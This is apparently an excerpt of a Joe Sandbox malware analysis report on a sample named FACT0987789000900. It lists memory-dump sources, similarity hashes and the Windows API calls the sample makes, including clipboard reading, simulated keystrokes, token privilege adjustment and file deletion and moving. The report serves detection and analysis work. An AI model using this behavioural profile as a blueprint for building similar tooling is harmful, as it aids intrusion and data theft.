                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 1144279405-0
                                                                                                                • Opcode ID: e1aff392ed43884aa54abedf2298abaf2c62430a68452eeb7e56048c276cb91a
                                                                                                                • Instruction ID: cfad82dc1b8b84b197febf3ade3a6825ac6e72196b43afb4008e5c2b85f7d5a7
                                                                                                                • Opcode Fuzzy Hash: e1aff392ed43884aa54abedf2298abaf2c62430a68452eeb7e56048c276cb91a
                                                                                                                • Instruction Fuzzy Hash: 8811C8728086008FD7117FA5C8017EA3A60EF81339F16424AE4341F1E2C7FC9D119BBA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                                                                                                • Instruction ID: 568085004595ad3f446fc11f7c4a362210f3e89dd53b37c4560e574c0db90f29
                                                                                                                • Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                                                                                                • Instruction Fuzzy Hash: 4C01863140010AAECF05EFA5C892CEEBF74AF21344F10806BB515971A5EA349A4ACB64
                                                                                                                APIs
                                                                                                                • __lock_file.LIBCMT ref: 004B2AED
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2597487223-0
                                                                                                                • Opcode ID: 3565756967d1f0365def4ff59dd9134f48d00702351428db31d3cad47d6dd6bb
                                                                                                                • Instruction ID: 9482f89b85546f8088029f9f6a31732f4d555df12214fde6dd7fdf5b9f3c4749
                                                                                                                • Opcode Fuzzy Hash: 3565756967d1f0365def4ff59dd9134f48d00702351428db31d3cad47d6dd6bb
                                                                                                                • Instruction Fuzzy Hash: 95F0C231500205AADF21BF768D067DF3AA5BF44318F25481BF4149A191C7BCCA22DB79
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,004939FE,?,00000001), ref: 00494286
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: af15b1f9b7cc3a646c90c86f983ac601e72edddf664f33f58dfdcc91004d9ab8
                                                                                                                • Instruction ID: baa64ea212a110fe77a118dfc07d3587128318d4cc836d68c1c5dffcdd661c28
                                                                                                                • Opcode Fuzzy Hash: af15b1f9b7cc3a646c90c86f983ac601e72edddf664f33f58dfdcc91004d9ab8
                                                                                                                • Instruction Fuzzy Hash: 62F08570405302DFCF348F60E880C12BBE0BF803A93208ABFF1C682610C33AA841DB54
                                                                                                                APIs
                                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004940C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongNamePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 82841172-0
                                                                                                                • Opcode ID: c3bbc519ae6d6c3215cf6c6b577ced7046043f2a9400db2edc5e2e991f777397
                                                                                                                • Instruction ID: 9006e33bcac89ec7e04ce8fd8b54f68bfbf1e5edb6020897beeb3e864534e9bf
                                                                                                                • Opcode Fuzzy Hash: c3bbc519ae6d6c3215cf6c6b577ced7046043f2a9400db2edc5e2e991f777397
                                                                                                                • Instruction Fuzzy Hash: DDE07D325001241BC711A358CC42FEA77ACDF88694F050075F908D3204DA68998186A0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2638373210-0
                                                                                                                • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                • Instruction ID: 4fb9a9badf1cd6d72898d3785e1092dab4dc6578faafb3e9538c5a9e328a879c
                                                                                                                • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                • Instruction Fuzzy Hash: 28E092B0204B009BD7348A24D810BE373E1EB09309F00081EF29A83341EB627841865D
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0134745B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                • Instruction ID: 842896c8d84e4b6b5e7f957671402eae34aa7163c224f61614c6e8923c69764f
                                                                                                                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                • Instruction Fuzzy Hash: D8E08C70A0520CEBDB20CAAC8C04AF97BECD708324F104654E916E33D0D634AA449614
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0134742B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                • Instruction ID: f44097e030dd42e78dcce65f487aec5607df50b0ddae4a1e88a92db6d202515d
                                                                                                                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                • Instruction Fuzzy Hash: D6D0A77090520CEBCB10CFB89C04AEA77ECD704324F004754FD15D3381D631A9509790
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01348E51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                • Instruction ID: 1f1d90ee44e667335b7811dd975afe8f88146841a1e5314571dc1cf9122a407f
                                                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                • Instruction Fuzzy Hash: 52E0BF7494010DEFDB10EFE4D5496DE7BB4EF04301F1005A1FD05E7691DB309E548A62
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01348E51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction ID: f3838cd2db701bcdab544bca33302da30878494c26d7274f09b686b70d8a4a53
                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction Fuzzy Hash: F0E0E67494010DDFDB00EFF4D54969E7FF4EF04301F1001A1FD05E2281D6309D508A62
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004FB1CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3850602802-328681919
                                                                                                                • Opcode ID: 177c84c8f72e0a3f185b676e881ae89b0ef8997aad2724b15d00e47baf3e8bc1
                                                                                                                • Instruction ID: 14bb95bd962f9455212e149adfeb4a0d6138a4e599058f57dfb9e804db8dc8e9
                                                                                                                • Opcode Fuzzy Hash: 177c84c8f72e0a3f185b676e881ae89b0ef8997aad2724b15d00e47baf3e8bc1
                                                                                                                • Instruction Fuzzy Hash: 0712D1B1500218ABEB249F65CD49FBB7BB8FF49310F10811AFA19DB2D0DB788905CB65
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 004AEB4A
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00503AEA
                                                                                                                • IsIconic.USER32(000000FF), ref: 00503AF3
                                                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00503B00
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00503B0A
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00503B20
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00503B27
                                                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00503B33
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00503B44
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00503B4C
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00503B54
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00503B57
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B6C
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00503B77
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B81
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00503B86
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B8F
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00503B94
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B9E
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00503BA3
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00503BA6
                                                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00503BCD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: fc62964508f5a018eefa114ea9a84fab77f12b2f541830c61d3a774040a5f77a
                                                                                                                • Instruction ID: 4d9139333da26e741a6c00c90d3090352b78767f899b0337577403b2f9b30d3b
                                                                                                                • Opcode Fuzzy Hash: fc62964508f5a018eefa114ea9a84fab77f12b2f541830c61d3a774040a5f77a
                                                                                                                • Instruction Fuzzy Hash: 8A318471A40318BBEB206BA58C4AFBF7F7CEB54B54F118415FA05EA1D0D6B15D04AAB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004CB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004CB180
                                                                                                                  • Part of subcall function 004CB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004CB1AD
                                                                                                                  • Part of subcall function 004CB134: GetLastError.KERNEL32 ref: 004CB1BA
                                                                                                                • _memset.LIBCMT ref: 004CAD08
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004CAD5A
                                                                                                                • CloseHandle.KERNEL32(?), ref: 004CAD6B
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004CAD82
                                                                                                                • GetProcessWindowStation.USER32 ref: 004CAD9B
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004CADA5
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004CADBF
                                                                                                                  • Part of subcall function 004CAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004CACC0), ref: 004CAB99
                                                                                                                  • Part of subcall function 004CAB84: CloseHandle.KERNEL32(?,?,004CACC0), ref: 004CABAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                • String ID: $default$winsta0$winsta0\default
                                                                                                                • API String ID: 2063423040-1685893292
                                                                                                                • Opcode ID: 12e7d9ee8d8fc640ee8aba9ab2786b22f32131d5ef4b3310525e8fa4a75a2717
                                                                                                                • Instruction ID: 6cd843dceadc445128d797bd0ba972f9bd42e934d56b08441b2335143ff51e36
                                                                                                                • Opcode Fuzzy Hash: 12e7d9ee8d8fc640ee8aba9ab2786b22f32131d5ef4b3310525e8fa4a75a2717
                                                                                                                • Instruction Fuzzy Hash: DC81587580020DAFDF519FA4CC49EEEBB78EF18308F04811EF914A6261D7798E64DB66
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004D5FA6,?), ref: 004D6ED8
                                                                                                                  • Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004D5FA6,?), ref: 004D6EF1
                                                                                                                  • Part of subcall function 004D725E: __wsplitpath.LIBCMT ref: 004D727B
                                                                                                                  • Part of subcall function 004D725E: __wsplitpath.LIBCMT ref: 004D728E
                                                                                                                  • Part of subcall function 004D72CB: GetFileAttributesW.KERNEL32(?,004D6019), ref: 004D72CC
                                                                                                                • _wcscat.LIBCMT ref: 004D6149
                                                                                                                • _wcscat.LIBCMT ref: 004D6167
                                                                                                                • __wsplitpath.LIBCMT ref: 004D618E
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004D61A4
                                                                                                                • _wcscpy.LIBCMT ref: 004D6209
                                                                                                                • _wcscat.LIBCMT ref: 004D621C
                                                                                                                • _wcscat.LIBCMT ref: 004D622F
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 004D625D
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 004D626E
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 004D6289
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 004D6298
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 004D62AD
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 004D62BE
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004D62E1
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004D62FD
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004D630B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1917200108-1173974218
                                                                                                                • Opcode ID: 88f868698930d69e381ec5d6a6df4dec761b67f9bc8b4255d47de203e5f3b78a
                                                                                                                • Instruction ID: 42574a0236cde17a64526605e30654406678e45cf1488f840a40feff6119171d
                                                                                                                • Opcode Fuzzy Hash: 88f868698930d69e381ec5d6a6df4dec761b67f9bc8b4255d47de203e5f3b78a
                                                                                                                • Instruction Fuzzy Hash: 2651307280811C6ACB21EB91CC54DDFB7BCAF15304F0641EBE595E2241DB3A97498FA8
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(0052DC00), ref: 004E6B36
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004E6B44
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 004E6B4C
                                                                                                                • CloseClipboard.USER32 ref: 004E6B58
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004E6B74
                                                                                                                • CloseClipboard.USER32 ref: 004E6B7E
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004E6B93
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 004E6BA0
                                                                                                                • GetClipboardData.USER32(00000001), ref: 004E6BA8
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004E6BB5
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004E6BE9
                                                                                                                • CloseClipboard.USER32 ref: 004E6CF6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 3222323430-0
                                                                                                                • Opcode ID: 5830ee31a176155dade531e50b4c29e7fdc0ecf2920277d7d60bd6a37b1d5989
                                                                                                                • Instruction ID: cb233ce545bf0dcdd7d536d6ce206205476265c0a47fb7b05513a9d05508fad6
                                                                                                                • Opcode Fuzzy Hash: 5830ee31a176155dade531e50b4c29e7fdc0ecf2920277d7d60bd6a37b1d5989
                                                                                                                • Instruction Fuzzy Hash: 3651D1312002016FD700AF62DC86FAF77B8AF64B46F01442EF556D22D0DF78E8099A6A
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004DF62B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004DF67F
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004DF6A4
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004DF6BB
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004DF6E2
